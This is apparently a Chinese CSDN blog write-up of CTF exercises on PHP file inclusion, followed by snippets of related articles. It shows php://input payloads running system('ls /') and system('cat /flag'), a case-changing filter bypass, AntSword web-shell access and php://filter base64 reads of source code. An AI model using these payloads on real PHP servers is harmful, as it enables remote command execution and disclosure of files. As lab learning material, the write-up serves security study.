文件包含&php伪协议

最新推荐文章于 2024-05-14 21:12:14 发布
最新推荐文章于 2024-05-14 21:12:14 发布
阅读量623 收藏 6
点赞数 7
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xiiaogu/article/details/134984977
版权

一、本地文件包含

法一:

点进去后使用Hackbar,用密码查找目录下文件(在地址上加?file=)

查到两个文件,没有flag

返回根目录下查找,输入ls /  (中间有空格)

找到好多文件,其中有flag

输入以下指令直接找flag

得到flag。

法二:蚁剑

右键添加数据,地址中加?file=,密码为ctfhub

添加完数据后打开终端,查找目录下文件,输入ls,没有flag

返回查找根目录,输入ls /,里边有flag文件

输入cat /flag查找flag

二、远程文件包含

PHP的配置文件php.ini里allow_url_fopen和allow_url_include为ON

改变请求方法为post可在下方请求数据。使用伪协议,输入?file=php://input,下方随便输,发现出现在右侧

输入<?php system('ls');?>找到俩文件

输入<?php system('ls /');?>找到flag文件

输入<?php system('cat /flag');?>找到flag

三、php://input 伪协议

题一:

抓包,在上方输入?file=php://input,下方输入<?php system('ls')?>查看目录下文件(因为用了伪协议所以GET传参也能用)

没有flag,再输入<?php system('ls /')?>查根目录

有一个很像flag,输入<?php system('cat /flag_11490')?>查看(用原文件名),找到了

题二:

框中长语句表示php://会被绕过,while循环限制了pphphp这种写法也不可用

str_replace可使用改变字母大小写的方式进行替换,注意将file改为page,然后在下方查找目录下文件

这个有点像

输入<?php system('cat fl4gisisish3r3.php')?>  (在目录下就不用/了)

四、php://filter 伪协议(读文件)

将文件进行base64编码再读出,即在file=后,flag前加上php://filter/read=convert.base64-encode/resource=

得到一串base64编码

将其复制到Burp中进行解码,得到flag

本题已给flag文件,直接过滤即可

Xiiaogu
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议的使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
php文件包含 伪协议
m0_64361111的博客
02-28 1045
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
php伪协议详解
DYFdingyifei的博客
03-11 614
总结: PHP伪协议是一种特殊的访问协议,用于在PHP代码中引用或执行远程文件。它提供了读取和写入文件的功能,可以用于本地文件和远程文件的操作。使用PHP伪协议时,应注意安全性问题,特别是远程文件执行风险和访问控制问题。它提供了一种在PHP代码中引用或执行远程文件的方式,而不必通过HTTP或其他传输协议。PHP伪协议是一种特殊的访问协议,用于在PHP代码中引用或执行在远程服务器上的文件。它的语法类似于URL,以php://开头,后跟一些特定的选项。文件读取 使用PHP伪协议可以读取本地或远程文件的内容。
文件包含时涉及PHP伪协议总结
最新发布
qq_43256965的博客
05-14 1080
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
文件包含漏洞之3PHP伪协议实战
ISNS的博客
04-03 2220
一、通过php_filter获取flag 1.php://filter介绍 1.定义: 2.举例说明: (1)直接读取数据流: (2)采用某种方式读取数据流,如果有两种及以上的读取方式,中间用 | 管道符隔开: (3)写入数据流: 2.CTF实战 平台:BugkuCTF 题目:flag在index里 链接:http://123.206.87.240:8005/post/ 1.点进去看到UR...
php伪协议文件包含
bring_coco的博客
05-14 3295
再说明一下,include()函数对文件后缀名无要求,而对其中的语法有要求,即使后缀名为txt,jpg也会被当做php文件解析,只要文件内是<?如果想要读取运行php文件的源码,可以先base64编码,再传入include函数,这样就不会被认为是php文件,不会执行,会输出文件的base64编码,再解码即可。命令:file://E:/phpStudy/PHPTutorial/WWW/DVWA-master/vulnerabilities/fi/2.txt。若采用rot13编码,对php文件中的<?
WEB入门——文件包含漏洞与PHP伪协议
HasntStartIsOver的博客
06-04 895
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。
文件包含PHP伪协议学习笔记
2302_80935968的博客
03-22 909
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
050-WEB攻防-PHP应用&文件包含&LFI&RFI&伪协议编码算法&无文件利用&黑白盒
wushangyu32335的博客
03-08 890
小迪安全2023笔记
php伪协议,文件包含[ZJCTF 2019]NiZhuanSiWei1
m0_74416116的博客
11-20 54
/那个psphp//调用反序列化,就会激发__tostring函数,这个文件已经被包含了php//调用反序列化,就会激发__tostring函数,这个文件已经被包含了//echo一个类的时候会激发这个类的__tostring方法,也算是自定义的一种序列化?tageturl/?
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3122
渗透测试-文件包含漏洞以及php伪协议的应用
什么是php伪协议,并举例说明
02-25
PHP伪协议PHP中一种特殊的机制,它允许开发者在PHP代码中通过特定的字符串格式来访问和处理非标准的数据源,这些数据源可能不是实际的网络协议,而是PHP内部或者自定义的数据接口。PHP伪协议的使用极大地扩展了PHP...
j7ur8#WebBook#伪协议文件包含1
07-25
伪协议参考利用条件filter的过滤器有很多。
关于Python、php伪协议等的100道题
02-24
PHP伪协议允许开发者在PHP内部直接访问特定资源,如file://用于读取本地文件,data://用于创建内联数据URI等。 1. PHP基础:变量声明、常量、数据类型、字符串处理、数组操作。 2. 控制结构:条件语句(if-else, ...
信息安全技术:PHP伪协议.pptx
11-01
【信息安全技术:PHP伪协议】 在信息安全领域,理解并掌握编程语言中的安全机制至关重要,特别是对于Web开发常用的语言PHPPHP伪协议PHP中的一种特殊机制,它允许开发者通过特定的URL格式来访问和操作各种资源...
PHP 伪协议详解
qq_39294511的博客
03-19 485
当谈到PHP伪协议时,我们需要深入了解其背后的机制、应用场景以及使用时的注意事项。
PHP伪协议精讲(文件包含漏洞)
2301_76251460的博客
07-21 780
PHP伪协议
PHP伪协议
qq_62604985的博客
07-10 1174
php伪协议,就是php支持的协议和封装协议file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流但是需要注意的是,当使用网络路径进行访问时,需要allow_url_fopen和allow_url_include都为ON。
PHP-伪协议
摘星怪sec的blog
04-25 3668
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
文件包含-伪协议filter
08-22
伪协议filter是一种用于文件包含伪协议。它不受allow_url_fopen和allow_url_include参数的影响,可以用来读取本地文件系统或访问HTTP、FTP等协议的URL。 在PHP中,可以使用php://filter伪协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [文件包含-伪协议](https://blog.csdn.net/Wu000999/article/details/101925271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTF---Web---文件包含---02---rot13伪协议](https://blog.csdn.net/qq_22160557/article/details/119174803)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值